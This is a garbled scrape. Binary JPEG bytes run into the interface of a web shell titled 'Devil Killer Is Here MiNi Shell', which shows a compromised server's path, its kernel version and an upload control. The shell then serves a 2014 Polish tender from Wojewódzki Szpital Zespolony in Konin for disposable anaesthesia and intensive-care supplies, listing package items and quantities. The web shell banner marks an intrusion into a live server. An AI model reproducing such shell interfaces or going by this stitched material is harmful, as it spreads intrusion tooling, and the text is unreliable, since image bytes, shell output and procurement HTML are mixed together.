JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140306/47393-N-2014.html

<p class="kh_header"><b>Konin: Dostawa Sprzętu jednorazowego użytku dla Oddziału Anestezjologii i Intensywnej Terapii Wojewódzkiego Szpitala Zespolonego w Koninie.</b><br>
<b>Numer ogłoszenia: 47393 - 2014; data zamieszczenia: 06.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony , ul. Szpitalna 45, 62-504 Konin, woj. wielkopolskie, tel. 063 2404133, faks 063 2404134.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.konin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa Sprzętu jednorazowego użytku dla Oddziału Anestezjologii i Intensywnej Terapii Wojewódzkiego Szpitala Zespolonego w Koninie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa sprzętu jednorazowego użytku dla Oddziału Anestezjologii i Intensywnej Terapii WSZ w Koninie w asortymencie i ilościach jak w załącznikach do niniejszego ogłoszenia.
2.Podane ilości są szacunkowe. Zamawiający zastrzega sobie zamówienie jedynie ilości zgodnych z faktycznymi potrzebami szpitala.
3. Szczegółowy opis zamówienia zawarty jest w SIWZ  nr WSZ-NZ-12/2014 dostępnej na stronie internetowej Zamawiającego pod adresem www.szpital-konin.pl w zakładce zakupy i przetargi/ zamówienia publiczne..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9, 33.14.12.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 20.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu , o których mowa w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu , o których mowa w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu , o których mowa w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu , o których mowa w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu , o których mowa w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Katalogi, opisy lub foldery oferowanych produktów, których autentuczność musi zostać poświadczona przez Wykonawcę na żądanie Zamawiającego</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Ceny , októrych mowa w ust. 1 nie będą ulegały zmianie w trakcie trwania umowy z wyjątkiem zmniejszenia w każdym przypadku ich wartości</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-konin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Zespolony w Koninie, ul. Szpitalna 45, 62-504 Konin, Dział zamówień publicznych, pokój 3/14, II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2014 godzina 10:00, miejsce: Wojewódzki Szpital Zespolony w Koninie, ul. Szpitalna 45, 62-504 Konin, Kancelaria pokój 3/13, II piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1. Lp.Nazwa towaru-asortyment Ilość -szt:1. Rurka intubacyjna z mankietem niskociśnieniowym z medycznego PCV 1.1.roz.5,0, 300, 1.2.	roz.5,5
300, 1.3. roz.6,0, 400, 1.4.	roz.6,5, 300, 1.5. roz.7,0, 400, 1.6. roz.7,5	1000,
1.7. roz.8,0, 2000, 1.8. roz.8,5, 250, 1.9. roz.9,0, 500, 1.10. roz.9,5, 50, 1.11. roz.10, 30,2. Rurka intubacyjna bez mankietu z medycznego PCV 2.1. roz.4,0, 100, 2.2. roz.4,5, 100, 2.3.	roz.5,0, 100, 2.4. roz.5,5, 100, 2.5. roz.6,0, 100,
2.6. roz.7,0, 50,3. Rurka intubacyjna specjalna z mankietem , do przedłużonej intubacji 3.1. roz.6,0, 10, 3.2. roz.6,5,10, 3.3. roz.7,0,50, 3.4. roz.7,5, 20, 3.5. roz.8,0, 50, 3.6. roz.8,5, 20, 3.7.	roz.9,0, 50,4. Rurka intubacyjna zbrojona z mankietem 4.1.	roz. 7,0 50, 4.2.	roz. 7,5, 100, 4.3. roz.8,0, 200, 4.4. roz. 8,5, 50, 4.5.	roz. 9,0,150,5. Rurka do intubacji przez nos z wstępnie uformowanymi dwoma wygięciami z mankietem 5.1. roz.6,0,	50, 5.2.roz.6,5, 100,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9, 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 2. Lp. Nazwa towaru-asortyment Ilość -szt.:1. Rurka tracheostomijna z mankietem wysokoobjętościowym niskociśnieniowym 1.1. roz.7,0,20, 1.2. roz.8,0,20, 1.3. roz.9,0, 20, 1.4.	roz.10,0, 10,2. Rurka tracheostomijna z mankietem niskociśnieniowym oraz możliwością odsysania wydzieliny 2.1. roz. 6,0,10, 2.2. roz.7,0, 20, 2.3. roz.8,0, 20, 2.4. roz.9,0, 20, 2.5. roz.10,0, 10,3. Rurka tracheostomijna z   mankietem niskociśnieniowym, z możliwością odsysania wydzieliny 3.1. roz.6,0	10, 3.2. roz.7,0,	10, 3.4. roz.8,0,	10, 3.5. roz. 9,0, 10, 3.6. roz.10,0	10,4. Rurka tracheostomijna z mankietem wysokoobjętościowym niskociśnieniowym 4.1. roz.6,0, 10, 4.2. roz.7,0, 10, 4.3. roz.8,0, 10, 4.4. roz.9,0, 10, 4.5. roz.10,0, 10,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9, 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.Lp. Nazwa towaru-asortyment Ilość -szt.: 1.Filtry oddechowe antybakteryjno-wirusowe dla dorosłych, elektrostatyczne, sterylne 3500, 2. Filtry antybakteryjno-wirusowe dla dorosłych, sterylne, mechaniczne 3000, 3. Filtry antybakteryjno-wirusowe dla dzieci, sterylne, elektrostatyczne 500 , 4. Filtr oddechowy, mechaniczny z plisowaną membraną hydrofobową 900, 5. Wymiennik ciepła i wilgoci 600, 6.Obwód oddechowy z PCV lub polietylenu sterylny, dla dorosłych 500, 7. Obwód oddechowy z PCV lub polietylenu dla dorosłych, sterylny 200, 8. Obwód oddechowy do znieczuleń dla dorosłych z polietylenu 400, 9. Obwód oddechowy dla dzieci z PCV lub  polietylenu, sterylny 50, 10. Obwód oddechowy dla dzieci z PCV  lub polietylenu 50, 11. Łącznik kątowy 120st podwójnie obrotowy 500, 12. Łącznik kątowy nieruchomy, do odsysania z gumową zatyczką, sterylny 500,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9, 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 4. Lp. Nazwa towaru-asortyment Ilość -szt.:1. System zamknięty do odsysania pacjentów do użytku wielodobowego 1.1. roz.10Ch,20, 1.2. roz.12Ch 20, 1.3. roz.14Ch, 400, 1.4. roz.16Ch, 400, 2. Wymienny cewnik z poliuretanowym workiem  2.1. roz.10Ch, 10, 2.2.	roz.12Ch, 10, 2.3. roz.14Ch, 50, 2.4. roz.16Ch, 50,3. System zamknięty do odsysania pacjentów do użytku wielodobowego 3.1.roz.12Ch, 20, 3.2. roz.14Ch, 500,4. Wymienny cewnik z poliuretanowym workiem 4.1. roz.12Ch,10, 4.2. roz.14Ch,50, 5.Zbiornik na wydzielinę z drzewa oskrzelowego 300,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9, 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 5.Lp. Nazwa towaru-asortyment Ilość -szt.: 1.Zestaw do  godzinowej zbiórki moczu 50, 2.Zestaw do toalety jamy ustnej 2000, 3. Zamknięty system do nieinwazyjnego pomiaru ciśnienia śródbrzusznego metodą manometryczną 10,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9, 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 6. Lp. Nazwa towaru-asortyment Ilość -szt.: 1.Zestawy do kaniulacji żył centralnych 100, 2. Zestawy do kaniulacji żył centralnych 300, 3. Zestawy do kaniulacji żył centralnych 300,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9, 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 7.L.p. Nazwa towaru-asortyment Ilość -szt.: 1.Zestawy do podaży grawitacyjnej żywienia enteralnego, jednorazowego użytku 1000,00 2. Dzierżawa pompy do żywienia enteralnego 12,00 3.Oprzyrządowanie do pompy z poz. 1 do podaży żywienia enteralnego 2000, 00..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9, 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 8.Lp. Nazwa towaru-asortyment Ilość -szt.: 1.Zestaw do znieczulenia zewnątrzoponowego ciągłego z cewnikiem 100,2.	Cewnik zewnątrzoponowy 18G zamknięty koniec trzy otwory boczne. Cewnik miękki 50, 3. Igła Tuohy 18G x 80 mm ze znacznikami co 1 cm.	50, 4. Filtr zewnątrzoponowy 0,2 mikrometra. Fabrycznie założony koreczek .	50, 5. Igła do znieczulenia podpajęczynówkowego 5.1	G 27 x 88-90 mm 500, 5.2	G 26 x 88-90mm 1800,
5.3 G 26 x 115-120 mm 50, 5.4 G 25 x 88-90 mm 1200, 5.5	G 25x 115-120 mm 50, 5.6 G 22 x 88 -90 mm 100, 5.7 Prowadnica do igieł G 20 700, 6. Igły do znieczulenia podpajęczynówkowego  ze szlifem Pencil Point  z prowadnicą 
6.1 G 25 x 88 -90 mm 50, 6.2 G 27 x 88 -90 mm 100, 7. Igły do znieczulenia podpajęczynówkowego  26 G x 88-90 mm, z prowadnicą 20G. 800,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9, 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 9.Lp. Nazwa towaru-asortyment Ilość -szt.:1.	Rampa z trzema kranikami trójdrożnymi i wielokolorowymi pokrętłami 300, 2.	Rampa z pięcioma kranikami trójdrożnymi i wielokolorowymi pokrętłami 300, 3.Przyrząd do wielokrotnego pobierania płynów i leków z filtrem przeciwbakteryjnym 100, 4.Bezigłowe zastawki do zabezpieczenia linii infuzyjnej  100,5.Bezigłowe zastawki do zabezpieczenia linii infuzyjnej z pojedynczym przedłużaczem 100, 6. Bezigłowe zastawki do zabezpieczenia linii infuzyjnej z podwójnym  przedłużaczem 30, 7. Przedłużacze do ramp z kranikami bez zawartości DEHP 600,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9, 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet nr 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 10.Lp. Nazwa towaru-asortyment	Ilość - szt.: 1. Uzupełniający zestaw do przezskórnej tracheotomii metodą Griggsa 1.1 rozmiar 8.0, 70, 1.2.  rozmiar 9.0,100, 2. Dren z trokarem ostrym typu trójgraniec, wykonany z termoplastycznego PCV 2.1. rozmiar 16 Ch/25-28cm, 30, 2.2. rozmiar 20 Ch/40cm, 50, 2.3. rozmiar 24 Ch/40cm, 100, 2.4.	rozmiar 28 Ch/40cm, 100, 2.5. rozmiar 32 Ch/40cm, 100,3.Zestaw do drenażu opłucnej (aktywnego i grawitacyjnego) z mechaniczną regulacją siły ssania 50, 4. Bezpieczny zestaw do punkcji opłucnej  10..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9, 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet nr 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 11.Lp. Nazwa towaru - asortyment	Ilość-szt,: 1.Koce grzewcze na całe ciało, wykonane z dwuwarstwowego materiału, 1.1 Dla dorosłych - 200,00
1.2 Dla dzieci -	100,00..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9, 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet nr 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 12.Lp.Nazwa towaru - asortyment Ilość-szt.: 1.Port naczyniowy z tytanową komorą i z pełnym zestawem  wprowadzającym 40,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9, 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet nr 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 13.Lp. Nazwa towaru - asortyment	 Ilość-szt.: 1.Czujnik do pomiaru ciśnienia metodą bezpośrednią - pojedyncze 100, 2.Czujnik do pomiaru ciśnienia metodą bezpośrednią - podwójne 100, 3. Płytka do mocowania przetworników 10, 4. Klamra do mocowania płytek 10,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9, 33.14.12.00-2.</p></li>
